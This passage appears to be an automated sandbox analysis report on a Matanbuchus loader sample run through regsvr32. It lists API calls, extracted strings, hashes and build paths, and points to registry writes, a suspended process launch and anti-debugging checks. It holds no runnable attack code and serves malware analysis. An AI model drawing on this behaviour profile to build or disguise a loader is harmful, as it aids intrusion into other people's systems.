                                                  • Part of subcall function 7F6EAA20: std::_Lockit::~_Lockit.LIBCPMT ref: 7F6EAA60
                                                • Concurrency::cancel_current_task.LIBCPMTD ref: 7F6E5867
                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 7F6E58FB
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.2016135931.000000007F6D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F6D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_7f6d0000_regsvr32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Lockitstd::_$Lockit::_Lockit::~_$Concurrency::cancel_current_task
                                                • String ID:
                                                • API String ID: 3053331623-0
                                                • Opcode ID: f3556af3355e22de888f0750b4bca4ef4573a40dc0135d0dea73ba47f78f4a39
                                                • Instruction ID: 1bd3cedffb5448354993840680d8a1970dd3eba6db4679c66bb0b8e2dcbb183d
                                                • Opcode Fuzzy Hash: f3556af3355e22de888f0750b4bca4ef4573a40dc0135d0dea73ba47f78f4a39
                                                • Instruction Fuzzy Hash: F741C7B5D01619DFCB04CF98D980AEEFBB1FF48310F204219E826A7394DB346A41CBA1
                                                APIs
                                                • std::_Lockit::_Lockit.LIBCPMT ref: 7F6E56C7
                                                • int.LIBCPMTD ref: 7F6E56E0
                                                  • Part of subcall function 7F6EAA20: std::_Lockit::_Lockit.LIBCPMT ref: 7F6EAA36
                                                  • Part of subcall function 7F6EAA20: std::_Lockit::~_Lockit.LIBCPMT ref: 7F6EAA60
                                                • Concurrency::cancel_current_task.LIBCPMTD ref: 7F6E5727
                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 7F6E57BB
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.2016135931.000000007F6D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F6D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_7f6d0000_regsvr32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Lockitstd::_$Lockit::_Lockit::~_$Concurrency::cancel_current_task
                                                • String ID:
                                                • API String ID: 3053331623-0
                                                • Opcode ID: 5a20efecd6822c2d319af579ac8ea99a50add469ff43f05b23e89ce273a56c1d
                                                • Instruction ID: 46c8122e86fc7bfa0414715aa7b050eea62761a99939ac8e9d0f4fd714ac2d36
                                                • Opcode Fuzzy Hash: 5a20efecd6822c2d319af579ac8ea99a50add469ff43f05b23e89ce273a56c1d
                                                • Instruction Fuzzy Hash: 3241A7B9D01609DFCB04CF98D990AEEBBB5FF48310F204259E815A7394DB346A55CFA1
                                                APIs
                                                • std::_Lockit::_Lockit.LIBCPMT ref: 7F6E5947
                                                • int.LIBCPMTD ref: 7F6E5960
                                                  • Part of subcall function 7F6EAA20: std::_Lockit::_Lockit.LIBCPMT ref: 7F6EAA36
                                                  • Part of subcall function 7F6EAA20: std::_Lockit::~_Lockit.LIBCPMT ref: 7F6EAA60
                                                • Concurrency::cancel_current_task.LIBCPMTD ref: 7F6E59A7
                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 7F6E5A3B
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.2016135931.000000007F6D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F6D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_7f6d0000_regsvr32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Lockitstd::_$Lockit::_Lockit::~_$Concurrency::cancel_current_task
                                                • String ID:
                                                • API String ID: 3053331623-0
                                                • Opcode ID: 9d28b4cc9b8c098d98dc5b2a5dca72cf918ae4e4768b9a3eefbbd1654781637d
                                                • Instruction ID: c1ffe03c73dd792af7d28f7ca4f25f99b48c70ce8933adc228bbda53f6f00f19
                                                • Opcode Fuzzy Hash: 9d28b4cc9b8c098d98dc5b2a5dca72cf918ae4e4768b9a3eefbbd1654781637d
                                                • Instruction Fuzzy Hash: D441A8B5D01609DFCB04CF98D980AEEFBB5FF48310F208259D915A7394D7346A45CBA1
                                                APIs
                                                • __EH_prolog3.LIBCMT ref: 7F72FDAB
                                                • std::_Lockit::_Lockit.LIBCPMT ref: 7F72FDB6
                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 7F72FE24
                                                  • Part of subcall function 7F72FF07: std::locale::_Locimp::_Locimp.LIBCPMT ref: 7F72FF1F
                                                • std::locale::_Setgloballocale.LIBCPMT ref: 7F72FDD1
                                                • _Yarn.LIBCPMT ref: 7F72FDE7
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.2016135931.000000007F6D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F6D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_7f6d0000_regsvr32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
                                                • String ID:
                                                • API String ID: 1088826258-0
                                                • Opcode ID: 1d8eb469b6719c7ca81517f86dd01e3cdf7bbded7637f438336c9610b9ebef27
                                                • Instruction ID: 140f8825aaded3700b76426733e783e0bd991507800842eee49cfbaab8c9cef5
                                                • Opcode Fuzzy Hash: 1d8eb469b6719c7ca81517f86dd01e3cdf7bbded7637f438336c9610b9ebef27
                                                • Instruction Fuzzy Hash: E0017C7AB00255ABDB06DF24DA586BD7BB5FFC5221B284049D8229B380DF746B52CB81
                                                APIs
                                                • LoadLibraryExW.KERNEL32(00000011,00000000,00000800,?,7F734F43,00000000,00000001,7FA355E4,?,?,?,7F7350E6,00000004,InitializeCriticalSectionEx,7F75AE34,InitializeCriticalSectionEx), ref: 7F734F9F
                                                • GetLastError.KERNEL32(?,7F734F43,00000000,00000001,7FA355E4,?,?,?,7F7350E6,00000004,InitializeCriticalSectionEx,7F75AE34,InitializeCriticalSectionEx,00000000,?,7F734E9D), ref: 7F734FA9
                                                • LoadLibraryExW.KERNEL32(00000011,00000000,00000000,?,00000011,7F733D43), ref: 7F734FD1
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.2016135931.000000007F6D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F6D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_7f6d0000_regsvr32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: LibraryLoad$ErrorLast
                                                • String ID: api-ms-
                                                • API String ID: 3177248105-2084034818
                                                • Opcode ID: 444b812013b6376e68ee4edbbb89991e3e5d40ddbd42d3626101aa404d7ee330
                                                • Instruction ID: 1c1859f5569e94a646d8d1843c43f6b158aac49d0ea18be2144f1a8e68c52b2d
                                                • Opcode Fuzzy Hash: 444b812013b6376e68ee4edbbb89991e3e5d40ddbd42d3626101aa404d7ee330
                                                • Instruction Fuzzy Hash: EDE0923668430AB7EF021EA1DC06B083A65AF51761F384030F90EAE491E761E5329980
                                                APIs
                                                • GetModuleHandleW.KERNEL32(ntdll.dll,RtlRandomEx,?,7F72F717,?,?,?,7F72EF6C,?,0000000F,?,00000000,00000208), ref: 7F72F946
                                                • GetProcAddress.KERNEL32(00000000), ref: 7F72F94D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.2016135931.000000007F6D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F6D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_7f6d0000_regsvr32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AddressHandleModuleProc
                                                • String ID: RtlRandomEx$ntdll.dll
                                                • API String ID: 1646373207-4284430886
                                                • Opcode ID: 1c7197c36744fb5c9b1c26a23c7b2084665452312c440e1d3a75e42447519efc
                                                • Instruction ID: 35b76a9f21ef0bef0515527acb6630c389d519434c4e948dd1cfd69658218808
                                                • Opcode Fuzzy Hash: 1c7197c36744fb5c9b1c26a23c7b2084665452312c440e1d3a75e42447519efc
                                                • Instruction Fuzzy Hash: FDD09E7A61020A6FDA005BE6CC49A553FB8AF485653540411FD4DCB100D72596799A50
                                                APIs
                                                • std::exception::exception.LIBCONCRTD ref: 7F705868
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.2016135931.000000007F6D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F6D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_7f6d0000_regsvr32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: std::exception::exception
                                                • String ID: parse error$parse_error
                                                • API String ID: 2807920213-1820534363
                                                • Opcode ID: 439e9027e77160ca1022926875720382d4c76b40215f0dc6d27ea21e7b99a262
                                                • Instruction ID: ac7d23b3aa6dbc82bef5a298e59047c3910021a2049b0d325dfce519c8e3b5c5
                                                • Opcode Fuzzy Hash: 439e9027e77160ca1022926875720382d4c76b40215f0dc6d27ea21e7b99a262
                                                • Instruction Fuzzy Hash: F3A1FFB4D05258DFDB14CFA8C990BEEBBB1BF49300F208199E959AB341DB316A45CF94
                                                APIs
                                                • std::_Lockit::_Lockit.LIBCPMT ref: 7F6E7AF3
                                                • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 7F6E7BBF
                                                  • Part of subcall function 7F72FEA2: _Yarn.LIBCPMT ref: 7F72FEC1
                                                  • Part of subcall function 7F72FEA2: _Yarn.LIBCPMT ref: 7F72FEE5
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.2016135931.000000007F6D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F6D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_7f6d0000_regsvr32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Yarnstd::_$Locinfo::_Locinfo_ctorLockitLockit::_
                                                • String ID: bad locale name
                                                • API String ID: 1908188788-1405518554
                                                • Opcode ID: 3f8ee9f78b1b9edddc9f4134c87aba8908234defff3f62d19060d9773c83ae8b
                                                • Instruction ID: 741cc8d7c1ca8cedfb112472c69d5bfb7a4692d8f6ef84c8f12e581d6be93a26
                                                • Opcode Fuzzy Hash: 3f8ee9f78b1b9edddc9f4134c87aba8908234defff3f62d19060d9773c83ae8b
                                                • Instruction Fuzzy Hash: 454118B4E05289DFDB01CF98C954BAEFBF1BF49304F248199D414AB381C77A9A01CBA5

                                                Execution Graph

                                                Execution Coverage:0.7%
                                                Dynamic/Decrypted Code Coverage:100%
                                                Signature Coverage:0%
                                                Total number of Nodes:59
                                                Total number of Limit Nodes:2

                                                Control-flow Graph

                                                APIs
                                                • CreateMutexA.KERNEL32(00000000,00000001,?), ref: 7EC07A47
                                                • GetLastError.KERNEL32 ref: 7EC07B44
                                                • CloseHandle.KERNEL32(00000000,6FA9D62B,?,?,?), ref: 7EC07CBA
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2556486132.000000007EBE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EBE0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_7ebe0000_regsvr32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CloseCreateErrorHandleLastMutex
                                                • String ID: *$9mD$B$u${
                                                • API String ID: 4294037311-4130828584
                                                • Opcode ID: b2a48f09c93a2a662b40ba3ad8dbd567dae2fc81286a3a870beff72f0cc4503c
                                                • Instruction ID: ef72a88f4ba9bcd2952bf590036b77e99c30a3d3447d93667ac8bad66f41cb61
                                                • Opcode Fuzzy Hash: b2a48f09c93a2a662b40ba3ad8dbd567dae2fc81286a3a870beff72f0cc4503c
                                                • Instruction Fuzzy Hash: B4F14E7AD042A8CFDB14CFAACA917ADBBB1FF49304F10819AE559AB354D3344A81CF51

                                                Control-flow Graph

                                                APIs
                                                • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 7EC3CCEE
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2556486132.000000007EBE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EBE0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_7ebe0000_regsvr32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: DirectorySystem
                                                • String ID: )$2$?$m$n $e
                                                • API String ID: 2188284642-1749247282
                                                • Opcode ID: bd75bbf54bede2b864e543cb42ab292bc76c2687e3a76aee6dbd3eecdef29144
                                                • Instruction ID: 3722e97aa56fc7d1268c6d71ed1b4bfd59ece667ca8b4e8c777fa9534cb9f506
                                                • Opcode Fuzzy Hash: bd75bbf54bede2b864e543cb42ab292bc76c2687e3a76aee6dbd3eecdef29144
                                                • Instruction Fuzzy Hash: 7FF14B7AD042A8CFDB24CF6ACA957ADBBB1BF49300F2080DAD159AB354D7745A80CF51

                                                Control-flow Graph

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2556486132.000000007EBE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EBE0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_7ebe0000_regsvr32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ShellWindow
                                                • String ID: 2$MNo name attribute $Q$\$c
                                                • API String ID: 2831631499-3960561890
                                                • Opcode ID: 7d9ab9945a16f6ad2ce651b8cd9f6d72342bb2a667e67924c2f63720bf391a7d
                                                • Instruction ID: 971bead5d3a06ebfdb11e99a5895b35c7c42ee04234c9a955cafef95a9c216ce
                                                • Opcode Fuzzy Hash: 7d9ab9945a16f6ad2ce651b8cd9f6d72342bb2a667e67924c2f63720bf391a7d
                                                • Instruction Fuzzy Hash: 10A14A7AD042E8CFDB14CFAAC6807ADBBB1BF49300F2081AAE559AB345D7744A44CF55

                                                Control-flow Graph

                                                APIs
                                                • GetProcessHeap.KERNEL32 ref: 7EC2986F
                                                • GetDriveTypeA.KERNEL32(7EC681EC), ref: 7EC29903
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2556486132.000000007EBE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EBE0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_7ebe0000_regsvr32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: DriveHeapProcessType
                                                • String ID: *
                                                • API String ID: 2912393814-163128923
                                                • Opcode ID: 86f874f176d6dc445216474946f020efd5dcc5b1e16c16f48f2dea8c0df4eee8
                                                • Instruction ID: 1b4972bd6b94c4f0b7dac613eab679d40d4ec7850af55a44360b683315d9aebb
                                                • Opcode Fuzzy Hash: 86f874f176d6dc445216474946f020efd5dcc5b1e16c16f48f2dea8c0df4eee8
                                                • Instruction Fuzzy Hash: C2A1167AD043E8CFCB54CFAAC65079DBBB2BB49300F2481AAE559AB344D7300A45CF55
                                                APIs
                                                • IsProcessorFeaturePresent.KERNEL32(00000017,00000000), ref: 7EC41423
                                                • IsDebuggerPresent.KERNEL32 ref: 7EC414EF
                                                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 7EC41508
                                                • UnhandledExceptionFilter.KERNEL32(?), ref: 7EC41512
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2556486132.000000007EBE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EBE0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_7ebe0000_regsvr32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                • String ID:
                                                • API String ID: 254469556-0
                                                • Opcode ID: 44a15d9ec394f624d50627555eeac2b3d4bb903d5b1a463544d590824294e0a5
                                                • Instruction ID: 8be3e751763205d68ad0f3fc467bc5045f366150a87d50c3afcdcc025933a3ab
                                                • Opcode Fuzzy Hash: 44a15d9ec394f624d50627555eeac2b3d4bb903d5b1a463544d590824294e0a5
                                                • Instruction Fuzzy Hash: 6A312979D052189BDF20DFA1C9497CDBBB8AF08300F2045EAE40DAB240E7719B84CF55
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2556486132.000000007EBE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EBE0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_7ebe0000_regsvr32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: __aulldiv
                                                • String ID: @
                                                • API String ID: 3732870572-2766056989
                                                • Opcode ID: 5f4f48760db2e552bb39d169258d1ac138e117acb2fc7a97c82604e7304871c4
                                                • Instruction ID: 18f82219f116f68ad8d63fa9ab07157868a13e5b6e2e4e44937d89251aae6f83
                                                • Opcode Fuzzy Hash: 5f4f48760db2e552bb39d169258d1ac138e117acb2fc7a97c82604e7304871c4
                                                • Instruction Fuzzy Hash: F4719EB8E04259DFCB09CF99C490AAEBBB5BF48304F2081A9D915BB345C734AA41CF94

                                                Control-flow Graph

                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2556486132.000000007EBE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EBE0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_7ebe0000_regsvr32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: *$+$,$1$7$7$;$>$X$i$ivh$u$w
                                                • API String ID: 0-285284801
                                                • Opcode ID: a10643f3649718233e38afe4e8c127eb8605cc2c4fbb4bf010a68fe10eb3abf7
                                                • Instruction ID: 1167013ad0e0ef2c56b2be06343d08149acf1f702f32d770cbced96156f51c9d
                                                • Opcode Fuzzy Hash: a10643f3649718233e38afe4e8c127eb8605cc2c4fbb4bf010a68fe10eb3abf7
                                                • Instruction Fuzzy Hash: 8BB135B8E08288DFEB01CFA8C894BDEBBB1BF48304F104159E945BB385D7B55A45CB61
                                                APIs
                                                Strings
                                                • B:\Loader\Matanbuchus\Main module\Belial project\MatanbuchusLoader\MatanbuchusLoaderFiles\Matanbuchus\json.hpp, xrefs: 7EBEC27E, 7EBEC424
                                                • d, xrefs: 7EBEC2E0
                                                • d, xrefs: 7EBEC39C
                                                • d, xrefs: 7EBEC445
                                                • x < 0 and x < (std::numeric_limits<number_integer_t>::max)(), xrefs: 7EBEC283
                                                • n_chars < number_buffer.size() - 1, xrefs: 7EBEC429
                                                • @, xrefs: 7EBEC40D
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2556486132.000000007EBE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EBE0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_7ebe0000_regsvr32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: __aullrem
                                                • String ID: @$B:\Loader\Matanbuchus\Main module\Belial project\MatanbuchusLoader\MatanbuchusLoaderFiles\Matanbuchus\json.hpp$d$d$d$n_chars < number_buffer.size() - 1$x < 0 and x < (std::numeric_limits<number_integer_t>::max)()
                                                • API String ID: 3758378126-3644039597
                                                • Opcode ID: af74c10a30af731ef8fb713ab9411db1b9c74e3243293dc8c1a17d0295fed92d
                                                • Instruction ID: 58518dda44f64dc72ac03d039a7304cdb583e02d09d2dfd2c8a02ea397b7e944
                                                • Opcode Fuzzy Hash: af74c10a30af731ef8fb713ab9411db1b9c74e3243293dc8c1a17d0295fed92d
                                                • Instruction Fuzzy Hash: A6F1F278D00299DFEB14CF98C981B9DBFB2BF88304F208199D81AAB754D7746A84CF54
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2556486132.000000007EBE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EBE0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_7ebe0000_regsvr32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: __aulldiv__aullrem
                                                • String ID: @$B:\Loader\Matanbuchus\Main module\Belial project\MatanbuchusLoader\MatanbuchusLoaderFiles\Matanbuchus\json.hpp$d$d$d$false$n_chars < number_buffer.size() - 1
                                                • API String ID: 3839614884-178659603
                                                • Opcode ID: a8c398104265c3bf772700f2e24d1ae8fe19c21d5d4548246dc31a5194ad36ab
                                                • Instruction ID: b57130f0cb495ad914dfd211914239d07f319e6cf00fbce8e606d6de3eda6e66
                                                • Opcode Fuzzy Hash: a8c398104265c3bf772700f2e24d1ae8fe19c21d5d4548246dc31a5194ad36ab
                                                • Instruction Fuzzy Hash: 48E1CE78E00249DFDB15CF99C980A9EBFB2BF48304F2081AAD919AB754D7346A81CF55
                                                APIs
                                                • RegOpenKeyExW.ADVAPI32(80000001,SOFTWARE,00000000,000F003F,?,00000044,00000000), ref: 7EC3EF39
                                                • wsprintfW.USER32 ref: 7EC3EF86
                                                • RegCreateKeyExW.ADVAPI32(?,?,00000000,00000000,00000000,000F003F,00000000,00000000,00000000), ref: 7EC3EFA3
                                                • RegSetValueExW.ADVAPI32(00000000,bbb,00000000,00000003,00000000,00000000), ref: 7EC3EFC4
                                                • RegSetValueExW.ADVAPI32(00000000,kkk,00000000,00000003,?,0000000F), ref: 7EC3EFE4
                                                • RegCloseKey.ADVAPI32(00000000), ref: 7EC3EFFD
                                                • RegCloseKey.ADVAPI32(00000000), ref: 7EC3F008
                                                  • Part of subcall function 7EC3F6E7: GetTickCount.KERNEL32 ref: 7EC3F705
                                                • API ID: CloseValue$CountCreateOpenTickwsprintf
                                                • String ID: %s_%x%x$SOFTWARE$bbb$kkk
                                                APIs
                                                • GetCurrentProcess.KERNEL32(?), ref: 7EC3F149
                                                • IsWow64Process.KERNEL32(00000000), ref: 7EC3F150
                                                • CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 7EC3F18C
                                                • wsprintfW.USER32 ref: 7EC3F21A
                                                • CloseHandle.KERNEL32(00000000), ref: 7EC3F3A5
                                                • CloseHandle.KERNEL32(00000000), ref: 7EC3F3B0
                                                • API ID: Process$CloseHandle$CreateCurrentWow64wsprintf
                                                • String ID: 0x%x$?
                                                APIs
                                                • _ValidateLocalCookies.LIBCMT ref: 7EC43C17
                                                • ___except_validate_context_record.LIBVCRUNTIME ref: 7EC43C1F
                                                • _ValidateLocalCookies.LIBCMT ref: 7EC43CA8
                                                • __IsNonwritableInCurrentImage.LIBCMT ref: 7EC43CD3
                                                • _ValidateLocalCookies.LIBCMT ref: 7EC43D28
                                                • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 7EC43D3E
                                                • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 7EC43D53
                                                • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record___vcrt_initialize_locks___vcrt_uninitialize_locks
                                                • String ID: csm
                                                APIs
                                                • IsCharLowerA.USER32(00000073), ref: 7EC3C78A
                                                • GetModuleFileNameW.KERNEL32(00000000,kernel32,00000000), ref: 7EC3C7AA
                                                • API ID: CharFileLowerModuleName
                                                • String ID: 9mD$kernel32$u${
                                                APIs
                                                • std::bad_exception::bad_exception.LIBCMTD ref: 7EC33EFF
                                                • std::bad_exception::bad_exception.LIBCMTD ref: 7EC33F19
                                                • std::bad_exception::bad_exception.LIBCMTD ref: 7EC33F33
                                                • std::bad_exception::bad_exception.LIBCMTD ref: 7EC33F4D
                                                Strings
                                                • B:\Loader\Matanbuchus\Main module\Belial project\MatanbuchusLoader\MatanbuchusLoaderFiles\Matanbuchus\json.hpp, xrefs: 7EC33F69
                                                • false, xrefs: 7EC33F6E
                                                • API ID: std::bad_exception::bad_exception
                                                • String ID: B:\Loader\Matanbuchus\Main module\Belial project\MatanbuchusLoader\MatanbuchusLoaderFiles\Matanbuchus\json.hpp$false
                                                APIs
                                                • std::bad_exception::bad_exception.LIBCMTD ref: 7EC33DDF
                                                • std::bad_exception::bad_exception.LIBCMTD ref: 7EC33DF9
                                                • std::bad_exception::bad_exception.LIBCMTD ref: 7EC33E13
                                                • std::bad_exception::bad_exception.LIBCMTD ref: 7EC33E2D
                                                Strings
                                                • B:\Loader\Matanbuchus\Main module\Belial project\MatanbuchusLoader\MatanbuchusLoaderFiles\Matanbuchus\json.hpp, xrefs: 7EC33E49
                                                • false, xrefs: 7EC33E4E
                                                • API ID: std::bad_exception::bad_exception
                                                • String ID: B:\Loader\Matanbuchus\Main module\Belial project\MatanbuchusLoader\MatanbuchusLoaderFiles\Matanbuchus\json.hpp$false
                                                APIs
                                                • FreeLibrary.KERNEL32(00000000,?,7EC5413B,7EC51108,0000000C,7EC652A0,00000000,00000000,?,7EC54388,00000021,FlsSetValue,7EC6D860,7EC6D868,7EC652A0), ref: 7EC540EF
                                                • API ID: FreeLibrary
                                                • String ID: api-ms-$ext-ms-
                                                APIs
                                                • GetStdHandle.KERNEL32(000000F4,?,00003C16), ref: 7EC4F265
                                                • GetFileType.KERNEL32(00000000,?,00003C16), ref: 7EC4F277
                                                • swprintf.LIBCMT ref: 7EC4F298
                                                • WriteConsoleW.KERNEL32(00000000,?,?,?,00000000,?,?,?,?,00003C16), ref: 7EC4F2D5
                                                Strings
                                                • Assertion failed: %Ts, file %Ts, line %d, xrefs: 7EC4F28D
                                                • API ID: ConsoleFileHandleTypeWriteswprintf
                                                • String ID: Assertion failed: %Ts, file %Ts, line %d
                                                APIs
                                                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,FD2A3F40,7EC652A0,?,00000000,7EC63C13,000000FF,?,7EC5077A,7D83FC4D,?,7EC5074E,7EC652A0), ref: 7EC5081F
                                                • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 7EC50831
                                                • FreeLibrary.KERNEL32(00000000,?,00000000,7EC63C13,000000FF,?,7EC5077A,7D83FC4D,?,7EC5074E,7EC652A0), ref: 7EC50853
                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                • String ID: CorExitProcess$mscoree.dll
                                                APIs
                                                • std::_Lockit::_Lockit.LIBCPMT ref: 7EBF56C7
                                                • int.LIBCPMTD ref: 7EBF56E0
                                                  • Part of subcall function 7EBFAA20: std::_Lockit::_Lockit.LIBCPMT ref: 7EBFAA36
                                                  • Part of subcall function 7EBFAA20: std::_Lockit::~_Lockit.LIBCPMT ref: 7EBFAA60
                                                • Concurrency::cancel_current_task.LIBCPMTD ref: 7EBF5727
                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 7EBF57BB
                                                • API ID: Lockitstd::_$Lockit::_Lockit::~_$Concurrency::cancel_current_task
                                                APIs
                                                • std::_Lockit::_Lockit.LIBCPMT ref: 7EBF5807
                                                • int.LIBCPMTD ref: 7EBF5820
                                                  • Part of subcall function 7EBFAA20: std::_Lockit::_Lockit.LIBCPMT ref: 7EBFAA36
                                                  • Part of subcall function 7EBFAA20: std::_Lockit::~_Lockit.LIBCPMT ref: 7EBFAA60
                                                • Concurrency::cancel_current_task.LIBCPMTD ref: 7EBF5867
                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 7EBF58FB
                                                • API ID: Lockitstd::_$Lockit::_Lockit::~_$Concurrency::cancel_current_task
                                                APIs
                                                • std::_Lockit::_Lockit.LIBCPMT ref: 7EBF5947
                                                • int.LIBCPMTD ref: 7EBF5960
                                                  • Part of subcall function 7EBFAA20: std::_Lockit::_Lockit.LIBCPMT ref: 7EBFAA36
                                                  • Part of subcall function 7EBFAA20: std::_Lockit::~_Lockit.LIBCPMT ref: 7EBFAA60
                                                • Concurrency::cancel_current_task.LIBCPMTD ref: 7EBF59A7
                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 7EBF5A3B
                                                • API ID: Lockitstd::_$Lockit::_Lockit::~_$Concurrency::cancel_current_task
                                                APIs
                                                • __EH_prolog3.LIBCMT ref: 7EC3FDAB
                                                • std::_Lockit::_Lockit.LIBCPMT ref: 7EC3FDB6
                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 7EC3FE24
                                                  • Part of subcall function 7EC3FF07: std::locale::_Locimp::_Locimp.LIBCPMT ref: 7EC3FF1F
                                                • std::locale::_Setgloballocale.LIBCPMT ref: 7EC3FDD1
                                                • _Yarn.LIBCPMT ref: 7EC3FDE7
                                                • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
                                                APIs
                                                • CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,00000000,08000000,00000000,00000000,?,7EC0E206), ref: 7EC3F3F5
                                                • CloseHandle.KERNEL32(7EC0E206), ref: 7EC3F49F
                                                • CloseHandle.KERNEL32(?), ref: 7EC3F4A9
                                                • API ID: CloseHandle$CreateProcess
                                                • String ID: ?
                                                APIs
                                                • LoadLibraryExW.KERNEL32(00000011,00000000,00000800,?,7EC44F43,00000000,00000001,7EF455E4,?,?,?,7EC450E6,00000004,InitializeCriticalSectionEx,7EC6AE34,InitializeCriticalSectionEx), ref: 7EC44F9F
                                                • GetLastError.KERNEL32(?,7EC44F43,00000000,00000001,7EF455E4,?,?,?,7EC450E6,00000004,InitializeCriticalSectionEx,7EC6AE34,InitializeCriticalSectionEx,00000000,?,7EC44E9D), ref: 7EC44FA9
                                                • LoadLibraryExW.KERNEL32(00000011,00000000,00000000,?,00000011,7EC43D43), ref: 7EC44FD1
                                                • API ID: LibraryLoad$ErrorLast
                                                • String ID: api-ms-
                                                APIs
                                                • GetModuleHandleW.KERNEL32(ntdll.dll,RtlRandomEx,?,7EC3F717,?,?,?,7EC3EF6C,?,0000000F,?,00000000,00000208), ref: 7EC3F946
                                                • GetProcAddress.KERNEL32(00000000), ref: 7EC3F94D
